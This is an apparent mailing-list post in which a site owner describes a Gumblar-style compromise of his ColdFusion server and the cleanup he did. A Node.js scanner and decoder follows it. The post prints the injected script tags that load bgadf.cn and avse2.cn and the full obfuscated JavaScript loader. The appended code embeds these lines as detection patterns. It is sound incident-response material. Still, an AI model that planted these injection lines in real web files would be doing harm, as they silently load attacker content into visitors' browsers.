The recent attack on House of Fusion resulted in some useful
information as to what you should look for. In general, all or most of
the files with the following extensions were affected:
.cfm
.cfml
.htm
.html
.js
The following line of code was prepended to all files other than .js:
<script src=http://bgadf.cn></script>
This was added to both unencrypted and encrypted files, meaning the
cfide was affected. Luckily, the line was exactly as stated above with
a new line after it. This allows for a global find/replace to remove
it. Unfortunately, this seems to have killed my cfide/administrator,
requiring me to replace it with a copy from another machine.
The .js files had the following line of code added:
document.writeln ("<script src=\"http://bgadf.cn\";><\/script>");
Again, a search and replace was able to remove it across the board. An
important note is that the .js files in the cfide (the ajax files)
were affected and had to be repaired.
Finally, the following line of code was buried within at least one file:
<script src=http://avse2.cn></script>
This may be from something else or it may be from the same attack. I
did a global review of all script tags to see what may have been
compromised.

Finally, the following js code was set to a few pages:
function CBeKy(lFwuKN){ var TySUSIZW=new Function("ncX", "return
872821;");alert('NmTqOe');window.eval(); }
function NTZS(hWal){var UHrvVQkw=6,fAgz=5;var
qIMfd='72+0,126+0,122+2,136+4,116+2,130+4,121+1,38+2,142+4,126+0,120+0,139+1,124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3,124+4,139+1,73+1,58+4,38+2,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,122+2,136+4,116+2,130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,138+0,136+4,',bSBxeEp=qIMfd.split(',');rZh='';for(HVMYENy=0;HVMYENy<bSBxeEp.length-1;HVMYENy++){
cAT=bSBxeEp[HVMYENy].split('+');kNRwj =
parseInt(cAT[0]*fAgz)+parseInt(cAT[1]);kNRwj =
parseInt(kNRwj)/UHrvVQkw;rZh += String.fromCharCode(kNRwj);}return
rZh;}function QFuWuDkcLi(qno){  fff=op.split("66"); }
function TeMgRVEQ(fYbPy){var IQWqANfWqP=7,eJEBZ=6;var
gJQy='115+3,71+1,45+3,121+2,135+2,135+2,130+4,67+4,54+5,54+5,131+5,140+0,119+0,115+3,136+3,115+3,53+4,122+3,128+2,119+0,129+3,54+5,119+0,53+4,115+3,120+1,122+3,73+3,123+4,142+2,129+3,45+3,72+2,70+0,54+5,122+3,119+0,133+0,113+1,127+1,117+5,72+2,',macKV=gJQy.split(',');atI='';for(UneulXsVe=0;UneulXsVe<macKV.length-1;UneulXsVe++){
JaWNRsHd=macKV[UneulXsVe].split('+');rUw =
parseInt(JaWNRsHd[0]*eJEBZ)+parseInt(JaWNRsHd[1]);rUw =
parseInt(rUw)/IQWqANfWqP;atI += String.fromCharCode(rUw);}return
atI;}function wDbgVQuF(jNQiDLa){ window.eval(); }
document['wri5te'.replace(/[0-9]/,'')](NTZS('jiMm')+TeMgRVEQ('yNgMvmppl'));function
JSV(EvRaoC){ alert('UlzqkcMIyh'); }
function ZbpXNWbRF(gdGwIbxJ){ var BlYeMDbv=new Function("RVmHnKt",
"return 849704;"); fff=op.split("66"); fff.op.replace("v"); }

This matches the pattern of the Gumblar virus. According to the notes
on that virus, it modifies itself per site so the names of the
functions/variables might be different. On the other hand, there are
recognisable patterns that can be searched for. A segment of the
numbers above can be used as a search pattern:
116+2,130+4,121+1
71+1,45+3,121+2,135+2,135+2
etc.

This inclusion was not as clean as the scripts mentioned above and
caused errors in some of the content on the page where it was
injected.

Many have suggested that the IIS FTP may have been compromised but
that was not the case on my server. IIS FTP was not installed and I
searched the registry for any reference to it. I also made sure that
my FileZilla install had all of its accounts mapped to non-executable
directories, though there was no evidence of compromise. I sealed off
all of the shares between my machine and any other on the network
'just in case'. I'm still not sure how the virus got on the system,
but...

Finally, some of the sw*.exe files in the
C:\ColdFusion8\db\slserver54\bin directory were compromised with a
backdoor virus. I'm not sure if this is related but I cleaned that up
as well. Whatever happens, scan your whole system with multiple virus
scanners. I installed Malwarebytes and CureIt along with my standard
anti-virus software. Always good to get a second opinion.
http://www.malwarebytes.org/
http://www.freedrweb.com/cureit/

Oh, and PowerGREP. It's fantastic!

-- 
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion    (http://www.houseoffusion.com)
Publisher: Fusion Authority    (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Yes, I am Mr. "bad boy" to everyone

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Want to reach the ColdFusion community with something they want? Let them know 
on the House of Fusion mailing lists
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326391
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
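The scan-and-clean procedure and the Gumblar search pattern from the message above, as an added example in Node.js. This is not code from the original post, from House of Fusion, or from any scanner the author used. It checks content for the injection forms the post lists (the exact bgadf.cn lines, the avse2.cn tag, and a run of "NNN+D," tokens), strips the two exact lines a global find/replace removed, and decodes the "a+b" number strings by reproducing the injected loop's arithmetic so the hidden target can be read without evaluating the script. The run-of-tokens signature is an assumption that the encoding scheme, not the digits, is what stays constant across the per-site variants; the sample .cfm and .js contents are constructed for the demo, and the two decoder declarations are copied from the payload quoted in the post.

```javascript
'use strict';
// Added example (not code from the original post, House of Fusion, or any
// scanner the author used): finds the injection forms described in the post,
// strips the two exact lines that a global find/replace removed, and decodes
// the "a+b" number strings of the Gumblar-style payload without running it.
// The sample inputs at the bottom are constructed for this demo.

// Exact line prepended to .cfm/.cfml/.htm/.html files, newline included.
const SCRIPT_LINE = '<script src=http://bgadf.cn></script>\n';
// Exact line added to .js files.
const WRITELN_LINE =
  'document.writeln ("<script src=\\"http://bgadf.cn\\";><\\/script>");';
// Second domain found buried in at least one file.
const SECOND_DOMAIN_RE = /<script src=http:\/\/avse2\.cn><\/script>/;
// Encoded payload: a run of "NNN+D," tokens. The post's search segments
// (116+2,130+4,121+1 and so on) match this; the generic form is an assumption
// that the encoding scheme, not the digits, stays constant between variants.
const ENCODED_RUN_RE = /(?:\d{2,3}\+\d,){6,}/;
// Decoder constants and string as they appear in the injected functions:
//   var <divisor>=N,<multiplier>=M;var <name>='<tokens>'
const ENCODED_DECL_RE = /var\s+\w+=(\d+),\w+=(\d+);var\s+\w+='([\d+,]+)'/g;

// Returns the name of every injection form present in content.
function scanForInjection(content) {
  const findings = [];
  if (content.includes(SCRIPT_LINE)) findings.push('bgadf.cn script tag');
  if (content.includes(WRITELN_LINE)) findings.push('bgadf.cn document.writeln');
  if (SECOND_DOMAIN_RE.test(content)) findings.push('avse2.cn script tag');
  if (ENCODED_RUN_RE.test(content)) findings.push('encoded Gumblar-style payload');
  return findings;
}

// The global find/replace from the post: remove the two exact lines wherever
// they occur. The encoded payload is only reported, since it was not injected
// cleanly and the surrounding page needs a manual look.
function cleanInjection(content) {
  return content.split(SCRIPT_LINE).join('').split(WRITELN_LINE).join('');
}

// Mirrors the injected loop: token "a+b" becomes
// String.fromCharCode((a*mul + b) / div). The trailing comma leaves an empty
// last token, which the original skips with length-1.
function decodeGumblarString(tokens, mul, div) {
  const parts = tokens.split(',');
  let out = '';
  for (let i = 0; i < parts.length - 1; i++) {
    const [a, b] = parts[i].split('+');
    out += String.fromCharCode((parseInt(a, 10) * mul + parseInt(b, 10)) / div);
  }
  return out;
}

// Finds every decoder declaration in injected JS and decodes it, so the
// hidden target can be read without evaluating anything.
function decodeEmbeddedStrings(jsSource) {
  const decoded = [];
  for (const m of jsSource.matchAll(ENCODED_DECL_RE)) {
    decoded.push(decodeGumblarString(m[3], parseInt(m[2], 10), parseInt(m[1], 10)));
  }
  return decoded;
}

// Constructed samples: an infected .cfm page, an infected .js file, and the
// two decoder declarations copied from the payload quoted in the post.
const SAMPLE_CFM = SCRIPT_LINE + '<cfset x = 1>\n<html><body>ok</body></html>\n';
const SAMPLE_JS = 'function f(){return 1;}\n' + WRITELN_LINE + '\n';
const SAMPLE_PAYLOAD =
  "var UHrvVQkw=6,fAgz=5;var qIMfd='72+0,126+0,122+2,136+4,116+2,130+4,121+1," +
  "38+2,142+4,126+0,120+0,139+1,124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3," +
  "124+4,139+1,73+1,58+4,38+2,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3," +
  "38+2,122+2,136+4,116+2,130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4," +
  "73+1,57+3,38+2,138+0,136+4,';" +
  "var IQWqANfWqP=7,eJEBZ=6;var gJQy='115+3,71+1,45+3,121+2,135+2,135+2,130+4," +
  "67+4,54+5,54+5,131+5,140+0,119+0,115+3,136+3,115+3,53+4,122+3,128+2,119+0," +
  "129+3,54+5,119+0,53+4,115+3,120+1,122+3,73+3,123+4,142+2,129+3,45+3,72+2," +
  "70+0,54+5,122+3,119+0,133+0,113+1,127+1,117+5,72+2,';";

if (typeof require !== 'undefined' && require.main === module) {
  const samples = [['page.cfm', SAMPLE_CFM], ['ajax.js', SAMPLE_JS], ['payload', SAMPLE_PAYLOAD]];
  for (const [name, text] of samples) console.log(name, scanForInjection(text));
  console.log(decodeEmbeddedStrings(SAMPLE_PAYLOAD).join(''));
}
```

Run with `node` to see the findings for each sample and the decoded payload, which joins into a 1x1 hidden iframe tag whose src is the real target of the injection. To sweep a site, read each .cfm/.cfml/.htm/.html/.js file, call scanForInjection on its text, write back cleanInjection's result for files that only carry the exact bgadf.cn lines, and hand-review anything flagged as an encoded payload.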